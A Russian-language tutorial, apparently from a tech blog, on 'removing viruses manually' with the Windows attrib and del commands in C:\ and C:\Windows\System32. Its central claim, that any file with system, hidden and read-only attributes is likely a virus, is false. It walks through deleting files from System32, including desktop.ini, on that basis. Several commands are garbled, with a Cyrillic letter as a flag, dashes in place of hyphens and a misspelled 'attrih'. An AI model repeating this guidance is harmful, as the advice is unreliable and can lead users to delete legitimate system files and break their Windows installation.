Запуск командной строки от имени администратора

Кратко о том, какие цели у наших будущих действий:

С помощью команды attrib нужно найти такие файлы, которые не должны находиться среди системных файлов и потому могут быть подозрительными.

Вообще, в C: / drive не должно содержаться никаких .exe или .inf файлов. И в папке C:\Windows\System32 также не должны содержаться какие-либо, кроме системных, скрытые или только для чтения файлы с атрибутами i, e S H R .

Итак, начнём ручной поиск подозрительных, файлов, то есть вероятных вирусов, самостоятельно, без использования специальных программ.

Откройте командную строку и вставьте cmd . Запустите этот файл от имени администратора.

Открываем cmd

Прописываем в строке cd/ для доступа к диску. Затем вводим команду attrib . После каждой команды не забываем нажимать ENTER:

Команда attrib в командной строке

Как видим из последнего рисунка, файлов с расширениями .exe или .inf не обнаружено.

А вот пример с обнаруженными подозрительными файлами:

Вирусы в системе Windows

Диск С не содержит никаких файлов .еxе и. inf , пока вы не загрузите эти файлы вручную сами . Если вы найдёте какой-либо файл, подобный тем, которые мы нашли, и он отобразит S H R , тогда это может быть вирус .

Здесь обнаружились 2 таких файла:

autorun. inf

sscv.exe

Эти файлы имеют расширения .еxе и. inf и имеют атрибуты S H R . Значит, эти файлы могут быть вирусами .

Теперь наберите attrib -s -h -г -а -i filename. extension . Или в нашем примере это:

attrib — s — h — г — а -i autorun. inf

Эта команда изменит их свойства, сделав из них обычные файлы. Дальше их можно будет удалить.

Для удаления этих файлов введите del filename. extension или в нашем случае:

del autorun.inf

То же самое надо проделать со вторым файлом:

Удаление вирусов вручную

Теперь перейдём к папке System32.

Впишите cd win* и нажмите ENTER.

Снова введите s ystem32. Нажмите ENTER.

Затем впишите команду attrib . Нажмите ENTER.

Появился вот такой длинный список:

Снова вводим внизу команду attrib , не забывая нажать потом ENTER :

И находим вот такие файлы:

Подозрительные файлы в папке Windows

При перемещении вверх-вниз экран перемещается очень быстро, поэтому когда мелькнёт что-то новое, приостановитесь и вернитесь назад‚ чтобы проверить каждый файл, не пропустив ни одного.

Подозрительные файлы в папке Windows

Выписываем себе все найденные S H R файлы :

1. atr. inf
2. dcr. exe
3. desktop. ini
4. idsev.exe

Выполните команду attrib 3 или 4 раза, чтобы убедиться, что вы проверили всё.

Ну, вот. Мы самостоятельно нашли целых 4 вредоносных файла! Теперь нам нужно удалить эти 4 вируса.

C:\Windows\System32>attrib -s -h -r -a -i atr.inf

C:\Windows\System32>del atr.inf

C:\Windows\System32>attrib -s -h -r -a -i dcr.exe

C:\Windows\System32>del dcr.exe

C:\Windows\System32>attrih -s -h -r -a -i desktop.ini

C:\Windows\\System32>del desktop.ini

C:\Windows\System32>attrib -s -h -r -a -i idsev.exe

C:\Windows\System32>del idsev.exe

Удаляем вирусы с компьютера самостоятельно

Аналогичную операцию надо провести с другими папками, вложенными в каталог Windows.

Нужно просканировать ещё несколько таких каталогов, как Appdata и Temp . Используйте команду attrib , как показано в этой статье, и удалите все файлы с атрибутами S H R, которые не имеют отношения к системным файлам и могут заразить ваш компьютер.